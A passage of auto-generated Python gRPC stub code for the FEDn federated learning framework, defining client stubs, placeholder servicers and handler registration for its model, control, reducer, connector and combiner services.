'/grpc.ModelService/Upload',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelRequest.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelResponse.FromString,
)
self.Download = channel.unary_stream(
'/grpc.ModelService/Download',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelRequest.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelResponse.FromString,
)
class ModelServiceServicer(object):
"""Missing associated documentation comment in .proto file."""
def Upload(self, request_iterator, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Download(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ModelServiceServicer_to_server(servicer, server):
"""
:param servicer:
:param server:
"""
rpc_method_handlers = {
'Upload': grpc.stream_unary_rpc_method_handler(
servicer.Upload,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelRequest.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelResponse.SerializeToString,
),
'Download': grpc.unary_stream_rpc_method_handler(
servicer.Download,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelRequest.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'grpc.ModelService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class ModelService(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def Upload(request_iterator,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request_iterator:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.stream_unary(request_iterator, target, '/grpc.ModelService/Upload',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout,
metadata)
@staticmethod
def Download(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_stream(request, target, '/grpc.ModelService/Download',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout,
metadata)
class ControlStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Start = channel.unary_unary(
'/grpc.Control/Start',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlResponse.FromString,
)
self.Stop = channel.unary_unary(
'/grpc.Control/Stop',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlResponse.FromString,
)
self.Configure = channel.unary_unary(
'/grpc.Control/Configure',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReportResponse.FromString,
)
self.Report = channel.unary_unary(
'/grpc.Control/Report',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReportResponse.FromString,
)
class ControlServicer(object):
"""Missing associated documentation comment in .proto file."""
def Start(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Stop(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Configure(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Report(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ControlServicer_to_server(servicer, server):
"""
:param servicer:
:param server:
"""
rpc_method_handlers = {
'Start': grpc.unary_unary_rpc_method_handler(
servicer.Start,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlResponse.SerializeToString,
),
'Stop': grpc.unary_unary_rpc_method_handler(
servicer.Stop,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlResponse.SerializeToString,
),
'Configure': grpc.unary_unary_rpc_method_handler(
servicer.Configure,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReportResponse.SerializeToString,
),
'Report': grpc.unary_unary_rpc_method_handler(
servicer.Report,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReportResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'grpc.Control', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Control(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def Start(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Control/Start',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Stop(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Control/Stop',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Configure(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Control/Configure',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReportResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Report(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Control/Report',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ControlRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReportResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
class ReducerStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetGlobalModel = channel.unary_unary(
'/grpc.Reducer/GetGlobalModel',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.GetGlobalModelRequest.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.GetGlobalModelResponse.FromString,
)
class ReducerServicer(object):
"""Missing associated documentation comment in .proto file."""
def GetGlobalModel(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ReducerServicer_to_server(servicer, server):
"""
:param servicer:
:param server:
"""
rpc_method_handlers = {
'GetGlobalModel': grpc.unary_unary_rpc_method_handler(
servicer.GetGlobalModel,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.GetGlobalModelRequest.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.GetGlobalModelResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'grpc.Reducer', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Reducer(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def GetGlobalModel(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Reducer/GetGlobalModel',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.GetGlobalModelRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.GetGlobalModelResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
class ConnectorStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.AllianceStatusStream = channel.unary_stream(
'/grpc.Connector/AllianceStatusStream',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Status.FromString,
)
self.SendStatus = channel.unary_unary(
'/grpc.Connector/SendStatus',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Status.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
)
self.ListActiveClients = channel.unary_unary(
'/grpc.Connector/ListActiveClients',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ListClientsRequest.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientList.FromString,
)
self.AcceptingClients = channel.unary_unary(
'/grpc.Connector/AcceptingClients',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ConnectionRequest.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ConnectionResponse.FromString,
)
self.SendHeartbeat = channel.unary_unary(
'/grpc.Connector/SendHeartbeat',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Heartbeat.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
)
self.ReassignClient = channel.unary_unary(
'/grpc.Connector/ReassignClient',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReassignRequest.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
)
self.ReconnectClient = channel.unary_unary(
'/grpc.Connector/ReconnectClient',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReconnectRequest.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
)
class ConnectorServicer(object):
"""Missing associated documentation comment in .proto file."""
def AllianceStatusStream(self, request, context):
"""Stream endpoint for status updates
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SendStatus(self, request, context):
"""Report endpoint
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListActiveClients(self, request, context):
"""rpc RegisterClient (ClientAvailableMessage) returns (Response);
List active clients endpoint
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def AcceptingClients(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SendHeartbeat(self, request, context):
"""Client messaging to stay engaged.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ReassignClient(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ReconnectClient(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ConnectorServicer_to_server(servicer, server):
"""
:param servicer:
:param server:
"""
rpc_method_handlers = {
'AllianceStatusStream': grpc.unary_stream_rpc_method_handler(
servicer.AllianceStatusStream,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Status.SerializeToString,
),
'SendStatus': grpc.unary_unary_rpc_method_handler(
servicer.SendStatus,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Status.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.SerializeToString,
),
'ListActiveClients': grpc.unary_unary_rpc_method_handler(
servicer.ListActiveClients,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ListClientsRequest.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientList.SerializeToString,
),
'AcceptingClients': grpc.unary_unary_rpc_method_handler(
servicer.AcceptingClients,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ConnectionRequest.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ConnectionResponse.SerializeToString,
),
'SendHeartbeat': grpc.unary_unary_rpc_method_handler(
servicer.SendHeartbeat,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Heartbeat.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.SerializeToString,
),
'ReassignClient': grpc.unary_unary_rpc_method_handler(
servicer.ReassignClient,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReassignRequest.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.SerializeToString,
),
'ReconnectClient': grpc.unary_unary_rpc_method_handler(
servicer.ReconnectClient,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReconnectRequest.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'grpc.Connector', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Connector(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def AllianceStatusStream(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_stream(request, target, '/grpc.Connector/AllianceStatusStream',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Status.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout,
metadata)
@staticmethod
def SendStatus(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Connector/SendStatus',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Status.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListActiveClients(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Connector/ListActiveClients',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ListClientsRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientList.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def AcceptingClients(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Connector/AcceptingClients',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ConnectionRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ConnectionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SendHeartbeat(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Connector/SendHeartbeat',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Heartbeat.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ReassignClient(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Connector/ReassignClient',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReassignRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ReconnectClient(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Connector/ReconnectClient',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ReconnectRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
class CombinerStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.ModelUpdateRequestStream = channel.unary_stream(
'/grpc.Combiner/ModelUpdateRequestStream',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdateRequest.FromString,
)
self.ModelUpdateStream = channel.unary_stream(
'/grpc.Combiner/ModelUpdateStream',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdate.FromString,
)
self.ModelValidationRequestStream = channel.unary_stream(
'/grpc.Combiner/ModelValidationRequestStream',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidationRequest.FromString,
)
self.ModelValidationStream = channel.unary_stream(
'/grpc.Combiner/ModelValidationStream',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidation.FromString,
)
self.SendModelUpdateRequest = channel.unary_unary(
'/grpc.Combiner/SendModelUpdateRequest',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdateRequest.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
)
self.SendModelUpdate = channel.unary_unary(
'/grpc.Combiner/SendModelUpdate',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdate.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
)
self.SendModelValidationRequest = channel.unary_unary(
'/grpc.Combiner/SendModelValidationRequest',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidationRequest.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
)
self.SendModelValidation = channel.unary_unary(
'/grpc.Combiner/SendModelValidation',
request_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidation.SerializeToString,
response_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
)
class CombinerServicer(object):
"""Missing associated documentation comment in .proto file."""
def ModelUpdateRequestStream(self, request, context):
"""Stream endpoints for training/validation pub/sub
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ModelUpdateStream(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ModelValidationRequestStream(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ModelValidationStream(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SendModelUpdateRequest(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SendModelUpdate(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SendModelValidationRequest(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SendModelValidation(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_CombinerServicer_to_server(servicer, server):
"""
:param servicer:
:param server:
"""
rpc_method_handlers = {
'ModelUpdateRequestStream': grpc.unary_stream_rpc_method_handler(
servicer.ModelUpdateRequestStream,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdateRequest.SerializeToString,
),
'ModelUpdateStream': grpc.unary_stream_rpc_method_handler(
servicer.ModelUpdateStream,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdate.SerializeToString,
),
'ModelValidationRequestStream': grpc.unary_stream_rpc_method_handler(
servicer.ModelValidationRequestStream,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidationRequest.SerializeToString,
),
'ModelValidationStream': grpc.unary_stream_rpc_method_handler(
servicer.ModelValidationStream,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidation.SerializeToString,
),
'SendModelUpdateRequest': grpc.unary_unary_rpc_method_handler(
servicer.SendModelUpdateRequest,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdateRequest.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.SerializeToString,
),
'SendModelUpdate': grpc.unary_unary_rpc_method_handler(
servicer.SendModelUpdate,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdate.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.SerializeToString,
),
'SendModelValidationRequest': grpc.unary_unary_rpc_method_handler(
servicer.SendModelValidationRequest,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidationRequest.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.SerializeToString,
),
'SendModelValidation': grpc.unary_unary_rpc_method_handler(
servicer.SendModelValidation,
request_deserializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidation.FromString,
response_serializer=fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'grpc.Combiner', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Combiner(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def ModelUpdateRequestStream(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_stream(request, target, '/grpc.Combiner/ModelUpdateRequestStream',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdateRequest.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout,
metadata)
@staticmethod
def ModelUpdateStream(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
